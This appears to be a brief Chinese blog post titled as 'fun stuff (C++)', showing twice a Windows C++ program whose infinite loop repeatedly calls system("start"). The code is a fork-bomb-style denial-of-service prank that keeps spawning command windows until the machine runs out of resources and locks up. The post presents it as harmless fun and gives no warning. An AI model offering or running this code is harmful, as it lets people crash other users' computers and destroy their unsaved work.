#include<iostream>
#include<windows.h>
using namespace std;
int main()
{
for(;;)
{
system("start");
}
}
好玩的东西(c++)
最新推荐文章于 2024-05-26 19:04:04 发布
#include<iostream>
#include<windows.h>
using namespace std;
int main()
{
for(;;)
{
system("start");
}
}